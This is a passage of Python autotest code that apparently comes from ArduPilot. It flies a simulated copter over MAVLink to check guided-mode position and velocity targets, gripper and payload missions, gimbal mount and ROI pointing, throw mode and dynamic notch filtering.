self.wait_mode("CIRCLE")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def fly_guided_stop(self,
timeout=20,
groundspeed_tolerance=0.05,
climb_tolerance=0.01):
"""stop the vehicle moving in guided mode"""
self.progress("Stopping vehicle")
tstart = self.get_sim_time()
# send a position-control command
self.mav.mav.set_position_target_local_ned_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_BODY_NED,
0b1111111111111000, # mask specifying use-only-x-y-z
0, # x
0, # y
0, # z
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Vehicle did not stop")
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
print("%s" % str(m))
if (m.groundspeed < groundspeed_tolerance and
m.climb < climb_tolerance):
break
def fly_guided_move_global_relative_alt(self, lat, lon, alt):
startpos = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
self.mav.mav.set_position_target_global_int_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT_INT,
0b1111111111111000, # mask specifying use-only-lat-lon-alt
lat, # lat
lon, # lon
alt, # alt
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 200:
raise NotAchievedException("Did not move far enough")
# send a position-control command
pos = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
delta = self.get_distance_int(startpos, pos)
self.progress("delta=%f (want >10)" % delta)
if delta > 10:
break
def fly_guided_move_local(self, x, y, z_up, timeout=100):
"""move the vehicle using MAVLINK_MSG_ID_SET_POSITION_TARGET_LOCAL_NED"""
startpos = self.mav.recv_match(type='LOCAL_POSITION_NED', blocking=True)
self.progress("startpos=%s" % str(startpos))
tstart = self.get_sim_time()
# send a position-control command
self.mav.mav.set_position_target_local_ned_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_LOCAL_NED,
0b1111111111111000, # mask specifying use-only-x-y-z
x, # x
y, # y
-z_up,# z
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Did not start to move")
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
print("%s" % m)
if m.groundspeed > 0.5:
break
self.progress("Waiting for vehicle to stop...")
self.wait_groundspeed(1, 100, timeout=timeout)
stoppos = self.mav.recv_match(type='LOCAL_POSITION_NED', blocking=True)
self.progress("stop_pos=%s" % str(stoppos))
x_achieved = stoppos.x - startpos.x
if x_achieved - x > 1:
raise NotAchievedException("Did not achieve x position: want=%f got=%f" % (x, x_achieved))
y_achieved = stoppos.y - startpos.y
if y_achieved - y > 1:
raise NotAchievedException("Did not achieve y position: want=%f got=%f" % (y, y_achieved))
z_achieved = stoppos.z - startpos.z
if z_achieved - z_up > 1:
raise NotAchievedException("Did not achieve z position: want=%f got=%f" % (z_up, z_achieved))
def test_guided_local_position_target(self, x, y, z_up):
""" Check target position being received by vehicle """
# set POSITION_TARGET_LOCAL_NED message rate using SET_MESSAGE_INTERVAL
self.progress("Setting local target in NED: (%f, %f, %f)" % (x, y, -z_up))
self.progress("Setting rate to 1 Hz")
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_POSITION_TARGET_LOCAL_NED, 1)
# set position target
self.mav.mav.set_position_target_local_ned_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_LOCAL_NED,
0b1111111111111000, # mask specifying use only xyz
x, # x
y, # y
-z_up, # z
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
m = self.mav.recv_match(type='POSITION_TARGET_LOCAL_NED', blocking=True, timeout=2)
self.progress("Received local target: %s" % str(m))
if not (m.type_mask == 0xFFF8 or m.type_mask == 0x0FF8):
raise NotAchievedException("Did not receive proper mask: expected=65528 or 4088, got=%u" % m.type_mask)
if x - m.x > 0.1:
raise NotAchievedException("Did not receive proper target position x: wanted=%f got=%f" % (x, m.x))
if y - m.y > 0.1:
raise NotAchievedException("Did not receive proper target position y: wanted=%f got=%f" % (y, m.y))
if z_up - (-m.z) > 0.1:
raise NotAchievedException("Did not receive proper target position z: wanted=%f got=%f" % (z_up, -m.z))
def test_guided_local_velocity_target(self, vx, vy, vz_up, timeout=3):
" Check local target velocity being recieved by vehicle "
self.progress("Setting local NED velocity target: (%f, %f, %f)" % (vx, vy, -vz_up))
self.progress("Setting POSITION_TARGET_LOCAL_NED message rate to 10Hz")
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_POSITION_TARGET_LOCAL_NED, 10)
# Drain old messages and ignore the ramp-up to the required target velocity
tstart = self.get_sim_time()
while self.get_sim_time_cached() - tstart < timeout:
# send velocity-control command
self.mav.mav.set_position_target_local_ned_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_LOCAL_NED,
0b1111111111000111, # mask specifying use only vx,vy,vz
0, # x
0, # y
0, # z
vx, # vx
vy, # vy
-vz_up, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
m = self.mav.recv_match(type='POSITION_TARGET_LOCAL_NED', blocking=True, timeout=1)
if m is None:
raise NotAchievedException("Did not receive any message for 1 sec")
self.progress("Received local target: %s" % str(m))
# Check the last received message
if not (m.type_mask == 0xFFC7 or m.type_mask == 0x0FC7):
raise NotAchievedException("Did not receive proper mask: expected=65479 or 4039, got=%u" % m.type_mask)
if vx - m.vx > 0.1:
raise NotAchievedException("Did not receive proper target velocity vx: wanted=%f got=%f" % (vx, m.vx))
if vy - m.vy > 0.1:
raise NotAchievedException("Did not receive proper target velocity vy: wanted=%f got=%f" % (vy, m.vy))
if vz_up - (-m.vz) > 0.1:
raise NotAchievedException("Did not receive proper target velocity vz: wanted=%f got=%f" % (vz_up, -m.vz))
self.progress("Received proper target velocity commands")
def test_position_target_message_mode(self):
" Ensure that POSITION_TARGET_LOCAL_NED messages are sent in Guided Mode only "
self.hover()
self.change_mode('LOITER')
self.progress("Setting POSITION_TARGET_LOCAL_NED message rate to 10Hz")
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_POSITION_TARGET_LOCAL_NED, 10)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + 5:
m = self.mav.recv_match(type='POSITION_TARGET_LOCAL_NED', blocking=True, timeout=1)
if m is None:
continue
raise NotAchievedException("Received POSITION_TARGET message in LOITER mode: %s" % str(m))
self.progress("Did not receive any POSITION_TARGET_LOCAL_NED message in LOITER mode. Success")
def earth_to_body(self, vector):
r = mavextra.rotation(self.mav.messages["ATTITUDE"]).invert()
# print("r=%s" % str(r))
return r * vector
def loiter_to_ne(self, x, y, z, timeout=40):
'''loiter to x, y, z from origin (in metres), z is *up*'''
dest_ned = rotmat.Vector3(x, y, -z)
tstart = self.get_sim_time()
success_start = -1
while True:
now = self.get_sim_time_cached()
if now - tstart > timeout:
raise NotAchievedException("Did not loiter to ne!")
m_pos = self.mav.recv_match(type='LOCAL_POSITION_NED',
blocking=True)
pos_ned = rotmat.Vector3(m_pos.x, m_pos.y, m_pos.z)
# print("dest_ned=%s" % str(dest_ned))
# print("pos_ned=%s" % str(pos_ned))
delta_ef = dest_ned - pos_ned
# print("delta_ef=%s" % str(delta_ef))
# determine if we've successfully navigated to close to
# where we should be:
dist = math.sqrt(delta_ef.x * delta_ef.x + delta_ef.y * delta_ef.y)
dist_max = 0.1
self.progress("dist=%f want <%f" % (dist, dist_max))
if dist < dist_max:
# success! We've gotten within our target distance
if success_start == -1:
success_start = now
elif now - success_start > 10:
self.progress("Yay!")
break
else:
success_start = -1
delta_bf = self.earth_to_body(delta_ef)
# print("delta_bf=%s" % str(delta_bf))
angle_x = math.atan2(delta_bf.y, delta_bf.z)
angle_y = -math.atan2(delta_bf.x, delta_bf.z)
distance = math.sqrt(delta_bf.x * delta_bf.x +
delta_bf.y * delta_bf.y +
delta_bf.z * delta_bf.z)
# att = self.mav.messages["ATTITUDE"]
# print("r=%f p=%f y=%f" % (math.degrees(att.roll), math.degrees(att.pitch), math.degrees(att.yaw)))
# print("angle_x=%s angle_y=%s" % (str(math.degrees(angle_x)), str(math.degrees(angle_y))))
# print("distance=%s" % str(distance))
self.mav.mav.landing_target_send(
0, # time_usec
1, # target_num
mavutil.mavlink.MAV_FRAME_GLOBAL, # frame; AP ignores
angle_x, # angle x (radians)
angle_y, # angle y (radians)
distance, # distance to target
0.01, # size of target in radians, X-axis
0.01 # size of target in radians, Y-axis
)
def fly_payload_place_mission(self):
"""Test payload placing in auto."""
self.context_push()
ex = None
try:
self.set_analog_rangefinder_parameters()
self.set_parameter("GRIP_ENABLE", 1)
self.set_parameter("GRIP_TYPE", 1)
self.set_parameter("SIM_GRPS_ENABLE", 1)
self.set_parameter("SIM_GRPS_PIN", 8)
self.set_parameter("SERVO8_FUNCTION", 28)
self.set_parameter("RC9_OPTION", 19)
self.reboot_sitl()
self.set_rc(9, 2000)
# load the mission:
self.load_mission("copter_payload_place.txt")
self.progress("Waiting for location")
self.mav.location()
self.zero_throttle()
self.change_mode('STABILIZE')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1500)
self.wait_text("Gripper load releas", timeout=90)
self.wait_disarmed()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
self.progress("All done")
if ex is not None:
raise ex
def fly_guided_change_submode(self):
""""Ensure we can move around in guided after a takeoff command."""
'''start by disabling GCS failsafe, otherwise we immediately disarm
due to (apparently) not receiving traffic from the GCS for
too long. This is probably a function of --speedup'''
self.set_parameter("FS_GCS_ENABLE", 0)
self.set_parameter("DISARM_DELAY", 0) # until traffic problems are fixed
self.change_mode("GUIDED")
self.wait_ready_to_arm()
self.arm_vehicle()
self.user_takeoff(alt_min=10)
self.start_subtest("yaw through absolute angles using MAV_CMD_CONDITION_YAW")
self.guided_achieve_heading(45)
self.guided_achieve_heading(135)
self.start_subtest("move the vehicle using set_position_target_global_int")
# the following numbers are 5-degree-latitude and 5-degrees
# longitude - just so that we start to really move a lot.
self.fly_guided_move_global_relative_alt(5, 5, 10)
self.start_subtest("move the vehicle using MAVLINK_MSG_ID_SET_POSITION_TARGET_LOCAL_NED")
self.fly_guided_stop(groundspeed_tolerance=0.1)
self.fly_guided_move_local(5, 5, 10)
self.start_subtest("Check target position received by vehicle using SET_MESSAGE_INTERVAL")
self.test_guided_local_position_target(5, 5, 10)
self.test_guided_local_velocity_target(2, 2, 1)
self.test_position_target_message_mode()
self.do_RTL()
def test_gripper_mission(self):
self.context_push()
ex = None
try:
self.load_mission("copter-gripper-mission.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.assert_vehicle_location_is_at_startup_location()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1500)
self.wait_statustext("Gripper Grabbed", timeout=60)
self.wait_statustext("Gripper Released", timeout=60)
except Exception as e:
self.print_exception_caught(e)
self.change_mode('LAND')
ex = e
self.context_pop()
self.wait_disarmed()
if ex is not None:
raise ex
def test_spline_last_waypoint(self):
self.context_push()
ex = None
try:
self.load_mission("copter-spline-last-waypoint.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1500)
self.wait_altitude(10, 3000, relative=True)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.do_RTL()
self.wait_disarmed()
if ex is not None:
raise ex
def fly_manual_throttle_mode_change(self):
self.set_parameter("FS_GCS_ENABLE", 0) # avoid GUIDED instant disarm
self.change_mode("STABILIZE")
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode("ACRO")
self.change_mode("STABILIZE")
self.change_mode("GUIDED")
self.set_rc(3, 1700)
self.watch_altitude_maintained(-1, 0.2) # should not take off in guided
self.run_cmd_do_set_mode(
"ACRO",
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.run_cmd_do_set_mode(
"STABILIZE",
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.run_cmd_do_set_mode(
"DRIFT",
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.progress("Check setting an invalid mode")
self.run_cmd(
mavutil.mavlink.MAV_CMD_DO_SET_MODE,
mavutil.mavlink.MAV_MODE_FLAG_CUSTOM_MODE_ENABLED,
126,
0,
0,
0,
0,
0,
want_result=mavutil.mavlink.MAV_RESULT_FAILED,
timeout=1
)
self.set_rc(3, 1000)
self.run_cmd_do_set_mode("ACRO")
self.wait_disarmed()
def test_mount_pitch(self, despitch, despitch_tolerance, timeout=10, hold=0):
tstart = self.get_sim_time()
success_start = 0
while True:
now = self.get_sim_time_cached()
if now - tstart > timeout:
raise NotAchievedException("Mount pitch not achieved")
m = self.mav.recv_match(type='MOUNT_STATUS',
blocking=True,
timeout=5)
# self.progress("pitch=%f roll=%f yaw=%f" %
# (m.pointing_a, m.pointing_b, m.pointing_c))
mount_pitch = m.pointing_a/100.0 # centidegrees to degrees
if abs(despitch - mount_pitch) > despitch_tolerance:
self.progress("Mount pitch incorrect: got=%f want=%f (+/- %f)" %
(mount_pitch, despitch, despitch_tolerance))
success_start = 0
continue
self.progress("Mount pitch correct: %f degrees == %f" %
(mount_pitch, despitch))
if success_start == 0:
success_start = now
continue
if now - success_start > hold:
self.progress("Mount pitch achieved")
return
def do_pitch(self, pitch):
'''pitch aircraft in guided/angle mode'''
self.mav.mav.set_attitude_target_send(
0, # time_boot_ms
1, # target sysid
1, # target compid
0, # bitmask of things to ignore
mavextra.euler_to_quat([0, math.radians(pitch), 0]), # att
0, # roll rate (rad/s)
1, # pitch rate
0, # yaw rate
0.5) # thrust, 0 to 1, translated to a climb/descent rate
def test_mount(self):
ex = None
self.context_push()
old_srcSystem = self.mav.mav.srcSystem
self.mav.mav.srcSystem = 250
self.set_parameter("DISARM_DELAY", 0)
try:
'''start by disabling GCS failsafe, otherwise we immediately disarm
due to (apparently) not receiving traffic from the GCS for
too long. This is probably a function of --speedup'''
self.set_parameter("FS_GCS_ENABLE", 0)
self.progress("Setting up servo mount")
roll_servo = 5
pitch_servo = 6
yaw_servo = 7
self.set_parameter("MNT_TYPE", 1)
self.set_parameter("SERVO%u_FUNCTION" % roll_servo, 8) # roll
self.set_parameter("SERVO%u_FUNCTION" % pitch_servo, 7) # pitch
self.set_parameter("SERVO%u_FUNCTION" % yaw_servo, 6) # yaw
self.reboot_sitl() # to handle MNT_TYPE changing
# make sure we're getting mount status and gimbal reports
self.mav.recv_match(type='MOUNT_STATUS',
blocking=True,
timeout=5)
self.mav.recv_match(type='GIMBAL_REPORT',
blocking=True,
timeout=5)
# test pitch isn't stabilising:
m = self.mav.recv_match(type='MOUNT_STATUS',
blocking=True,
timeout=5)
if m.pointing_a != 0 or m.pointing_b != 0 or m.pointing_c != 0:
raise NotAchievedException("Mount stabilising when not requested")
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
self.user_takeoff()
despitch = 10
despitch_tolerance = 3
self.progress("Pitching vehicle")
self.do_pitch(despitch) # will time out!
self.wait_pitch(despitch, despitch_tolerance)
# check we haven't modified:
m = self.mav.recv_match(type='MOUNT_STATUS',
blocking=True,
timeout=5)
if m.pointing_a != 0 or m.pointing_b != 0 or m.pointing_c != 0:
raise NotAchievedException("Mount stabilising when not requested")
self.progress("Enable pitch stabilization using MOUNT_CONFIGURE")
self.mav.mav.mount_configure_send(
1, # target system
1, # target component
mavutil.mavlink.MAV_MOUNT_MODE_RC_TARGETING,
0, # stab-roll
1, # stab-pitch
0)
self.do_pitch(despitch)
self.test_mount_pitch(-despitch, 1)
self.progress("Disable pitch using MAV_CMD_DO_MOUNT_CONFIGURE")
self.do_pitch(despitch)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_RC_TARGETING,
0,
0,
0,
0,
0,
0,
)
self.test_mount_pitch(0, 0)
self.progress("Point somewhere using MOUNT_CONTROL (ANGLE)")
self.do_pitch(despitch)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_MAVLINK_TARGETING,
0,
0,
0,
0,
0,
0,
)
self.mav.mav.mount_control_send(
1, # target system
1, # target component
20 * 100, # pitch
20 * 100, # roll (centidegrees)
0, # yaw
0 # save position
)
self.test_mount_pitch(20, 1)
self.progress("Point somewhere using MOUNT_CONTROL (GPS)")
self.do_pitch(despitch)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_GPS_POINT,
0,
0,
0,
0,
0,
0,
)
start = self.mav.location()
self.progress("start=%s" % str(start))
(t_lat, t_lon) = mavextra.gps_offset(start.lat, start.lng, 10, 20)
t_alt = 0
self.progress("loc %f %f %f" % (start.lat, start.lng, start.alt))
self.progress("targetting %f %f %f" % (t_lat, t_lon, t_alt))
self.do_pitch(despitch)
self.mav.mav.mount_control_send(
1, # target system
1, # target component
int(t_lat * 1e7), # lat
int(t_lon * 1e7), # lon
t_alt * 100, # alt
0 # save position
)
self.test_mount_pitch(-52, 5)
# now test RC targetting
self.progress("Testing mount RC targetting")
# this is a one-off; ArduCopter *will* time out this directive!
self.progress("Levelling aircraft")
self.mav.mav.set_attitude_target_send(
0, # time_boot_ms
1, # target sysid
1, # target compid
0, # bitmask of things to ignore
mavextra.euler_to_quat([0, 0, 0]), # att
1, # roll rate (rad/s)
1, # pitch rate
1, # yaw rate
0.5) # thrust, 0 to 1, translated to a climb/descent rate
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_RC_TARGETING,
0,
0,
0,
0,
0,
0,
)
try:
self.context_push()
self.set_parameter('MNT_RC_IN_ROLL', 11)
self.set_parameter('MNT_RC_IN_TILT', 12)
self.set_parameter('MNT_RC_IN_PAN', 13)
self.progress("Testing RC angular control")
# default RC min=1100 max=1900
self.set_rc_from_map({
11: 1500,
12: 1500,
13: 1500,
})
self.test_mount_pitch(0, 1)
self.progress("Testing RC input down 1/4 of its range in the output, should be down 1/4 range in output")
rc12_in = 1400
rc12_min = 1100 # default
rc12_max = 1900 # default
angmin_tilt = -45.0 # default
angmax_tilt = 45.0 # default
expected_pitch = (float(rc12_in-rc12_min)/float(rc12_max-rc12_min) * (angmax_tilt-angmin_tilt)) + angmin_tilt
self.progress("expected mount pitch: %f" % expected_pitch)
if expected_pitch != -11.25:
raise NotAchievedException("Calculation wrong - defaults changed?!")
self.set_rc(12, rc12_in)
self.test_mount_pitch(-11.25, 0.01)
self.set_rc(12, 1800)
self.test_mount_pitch(33.75, 0.01)
self.set_rc_from_map({
11: 1500,
12: 1500,
13: 1500,
})
try:
self.progress(
"Issue https://discuss.ardupilot.org/t/"
"gimbal-limits-with-storm32-backend-mavlink-not-applied-correctly/51438"
)
self.context_push()
self.set_parameter("RC12_MIN", 1000)
self.set_parameter("RC12_MAX", 2000)
self.set_parameter("MNT_ANGMIN_TIL", -9000)
self.set_parameter("MNT_ANGMAX_TIL", 1000)
self.set_rc(12, 1000)
self.test_mount_pitch(-90.00, 0.01)
self.set_rc(12, 2000)
self.test_mount_pitch(10.00, 0.01)
self.set_rc(12, 1500)
self.test_mount_pitch(-40.00, 0.01)
finally:
self.context_pop()
self.set_rc(12, 1500)
self.progress("Testing RC rate control")
self.set_parameter('MNT_JSTICK_SPD', 10)
self.test_mount_pitch(0, 1)
self.set_rc(12, 1300)
self.test_mount_pitch(-5, 1)
self.test_mount_pitch(-10, 1)
self.test_mount_pitch(-15, 1)
self.test_mount_pitch(-20, 1)
self.set_rc(12, 1700)
self.test_mount_pitch(-15, 1)
self.test_mount_pitch(-10, 1)
self.test_mount_pitch(-5, 1)
self.test_mount_pitch(0, 1)
self.test_mount_pitch(5, 1)
self.progress("Reverting to angle mode")
self.set_parameter('MNT_JSTICK_SPD', 0)
self.set_rc(12, 1500)
self.test_mount_pitch(0, 0.1)
self.context_pop()
except Exception as e:
self.print_exception_caught(e)
self.context_pop()
raise e
self.progress("Testing mount ROI behaviour")
self.drain_mav_unparsed()
self.test_mount_pitch(0, 0.1)
start = self.mav.location()
self.progress("start=%s" % str(start))
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
10,
20)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI_LOCATION")
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_SET_ROI_LOCATION,
0,
0,
0,
0,
roi_lat,
roi_lon,
roi_alt,
)
self.test_mount_pitch(-52, 5)
start = self.mav.location()
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
-100,
-200)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI")
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_SET_ROI,
0,
0,
0,
0,
roi_lat,
roi_lon,
roi_alt,
)
self.test_mount_pitch(-7.5, 1)
start = self.mav.location()
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
-100,
-200)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI (COMMAND_INT)")
self.run_cmd_int(
mavutil.mavlink.MAV_CMD_DO_SET_ROI,
0,
0,
0,
0,
int(roi_lat*1e7),
int(roi_lon*1e7),
roi_alt,
frame=mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT_INT,
)
self.test_mount_pitch(-7.5, 1)
self.progress("Using MAV_CMD_DO_SET_ROI (COMMAND_INT), absolute-alt-frame")
# this is pointing essentially straight down
self.run_cmd_int(
mavutil.mavlink.MAV_CMD_DO_SET_ROI,
0,
0,
0,
0,
int(roi_lat*1e7),
int(roi_lon*1e7),
roi_alt,
frame=mavutil.mavlink.MAV_FRAME_GLOBAL,
)
self.test_mount_pitch(-70, 1, hold=2)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_NEUTRAL,
0,
0,
0,
0,
0,
0,
)
self.test_mount_pitch(0, 0.1)
self.progress("Testing mount roi-sysid behaviour")
self.test_mount_pitch(0, 0.1)
start = self.mav.location()
self.progress("start=%s" % str(start))
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
10,
20)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI_SYSID")
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_SET_ROI_SYSID,
250,
0,
0,
0,
0,
0,
0,
)
self.mav.mav.global_position_int_send(
0, # time boot ms
int(roi_lat * 1e7),
int(roi_lon * 1e7),
0 * 1000, # mm alt amsl
0 * 1000, # relalt mm UP!
0, # vx
0, # vy
0, # vz
0 # heading
)
self.test_mount_pitch(-89, 5, hold=2)
self.mav.mav.global_position_int_send(
0, # time boot ms
int(roi_lat * 1e7),
int(roi_lon * 1e7),
670 * 1000, # mm alt amsl
100 * 1000, # mm UP!
0, # vx
0, # vy
0, # vz
0 # heading
)
self.test_mount_pitch(68, 5, hold=2)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_NEUTRAL,
0,
0,
0,
0,
0,
0,
)
self.test_mount_pitch(0, 0.1)
self.progress("checking ArduCopter yaw-aircraft-for-roi")
try:
self.context_push()
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
self.progress("current heading %u" % m.heading)
self.set_parameter("SERVO%u_FUNCTION" % yaw_servo, 0) # yaw
self.progress("Waiting for check_servo_map to do its job")
self.delay_sim_time(5)
start = self.mav.location()
self.progress("Moving to guided/position controller")
# the following numbers are 1-degree-latitude and
# 0-degrees longitude - just so that we start to
# really move a lot.
self.fly_guided_move_global_relative_alt(1, 0, 0)
self.guided_achieve_heading(0)
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
-100,
-200)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI")
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_SET_ROI,
0,
0,
0,
0,
roi_lat,
roi_lon,
roi_alt,
)
self.wait_heading(110, timeout=600)
self.context_pop()
except Exception:
self.context_pop()
raise
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.mav.mav.srcSystem = old_srcSystem
self.disarm_vehicle(force=True)
self.reboot_sitl() # to handle MNT_TYPE changing
if ex is not None:
raise ex
def fly_throw_mode(self):
# test boomerang mode:
self.progress("Throwing vehicle away")
self.set_parameters({
"THROW_NEXTMODE": 6,
"SIM_SHOVE_Z": -30,
"SIM_SHOVE_X": -20,
})
self.change_mode('THROW')
self.wait_ready_to_arm()
self.arm_vehicle()
try:
self.set_parameter("SIM_SHOVE_TIME", 500, retries=3)
except ValueError:
# the shove resets this to zero
pass
tstart = self.get_sim_time()
self.wait_mode('RTL')
max_good_tdelta = 15
tdelta = self.get_sim_time() - tstart
self.progress("Vehicle in RTL")
self.wait_rtl_complete()
self.progress("Vehicle disarmed")
if tdelta > max_good_tdelta:
raise NotAchievedException("Took too long to enter RTL: %fs > %fs" %
(tdelta, max_good_tdelta))
self.progress("Vehicle returned")
def hover_and_check_matched_frequency_with_fft(self, dblevel=-15, minhz=200, maxhz=300, peakhz=None, reverse=None):
# find a motor peak
self.takeoff(10, mode="ALT_HOLD")
hover_time = 15
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
vfr_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
tend = self.get_sim_time()
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
# batch sampler defaults give 1024 fft and sample rate of 1kz so roughly 1hz/bin
freq = psd["F"][numpy.argmax(psd["X"][minhz:maxhz]) + minhz] * (1000. / 1024.)
peakdb = numpy.amax(psd["X"][minhz:maxhz])
if peakdb < dblevel or (peakhz is not None and abs(freq - peakhz) / peakhz > 0.05):
if reverse is not None:
self.progress("Did not detect a motor peak, found %fHz at %fdB" % (freq, peakdb))
else:
raise NotAchievedException("Did not detect a motor peak, found %fHz at %fdB" % (freq, peakdb))
else:
if reverse is not None:
raise NotAchievedException(
"Detected motor peak at %fHz, throttle %f%%, %fdB" %
(freq, vfr_hud.throttle, peakdb))
else:
self.progress("Detected motor peak at %fHz, throttle %f%%, %fdB" % (freq, vfr_hud.throttle, peakdb))
return freq, vfr_hud, peakdb
def fly_dynamic_notches(self):
"""Use dynamic harmonic notch to control motor noise."""
self.progress("Flying with dynamic notches")
self.context_push()
ex = None
try:
self.set_parameters({
"AHRS_EKF_TYPE": 10,
"INS_LOG_BAT_MASK": 3,
"INS_LOG_BAT_OPT": 0,
"INS_GYRO_FILTER": 100, # set the gyro filter high so we can observe behaviour
"LOG_BITMASK": 958,
"LOG_DISARMED": 0,
"SIM_VIB_MOT_MAX": 350,
"SIM_GYR1_RND": 20,
})
self.reboot_sitl()
self.takeoff(10, mode="ALT_HOLD")
# find a motor peak
freq, vfr_hud, peakdb = self.hover_and_check_matched_frequency_with_fft(-15, 200, 300)
# now add a dynamic notch and check that the peak is squashed
self.set_parameters({
"INS_LOG_BAT_OPT": 2,
"INS_HNTCH_ENABLE": 1,
"INS_HNTCH_FREQ": freq,
"INS_HNTCH_REF": vfr_hud.throttle/100.,
"INS_HNTCH_HMNCS": 5, # first and third harmonic
"INS_HNTCH_ATT": 50,
"INS_HNTCH_BW": freq/2,
})
self.reboot_sitl()
freq, vfr_hud, peakdb1 = self.hover_and_check_matched_frequency_with_fft(-10, 20, 350, reverse=True)
# now add double dynamic notches and check that the peak is squashed
self.set_parameter("INS_HNTCH_OPTS", 1)
self.reboot_sitl()
freq, vfr_hud, peakdb2 = self.hover_and_check_matched_frequency_with_fft(-15, 20, 350, reverse=True)
# double-notch should do better, but check for within 5%
if peakdb2 * 1.05 > peakdb1:
raise NotAchievedException(
"Double-notch peak was higher than single-notch peak %fdB > %fdB" %
(peakdb2, peakdb1))
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def hover_and_check_matched_frequency(self, dblevel=-15, minhz=200, maxhz=300, fftLength=32, peakhz=None):
# find a motor peak
self.takeoff(10, mode="ALT_HOLD")
hover_time = 15
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
vfr_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
tend = self.get_sim_time()
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
# batch sampler defaults give 1024 fft and sample rate of 1kz so roughly 1hz/bin
scale = 1000. / 1024.
sminhz = int(minhz * scale)
smaxhz = int(maxhz * scale)
freq = psd["F"][numpy.argmax(psd["X"][sminhz:smaxhz]) + sminhz]
peakdb = numpy.amax(psd["X"][sminhz:smaxhz])
if peakdb < dblevel:
raise NotAchievedException("Did not detect a motor peak, found %fHz at %fdB" % (freq, peakdb))
elif peakhz is not None and abs(freq - peakhz) / peakhz > 0.05:
raise NotAchievedException("Did not detect a motor peak at %fHz, found %fHz at %fdB" % (peakhz, freq, peakdb))
else:
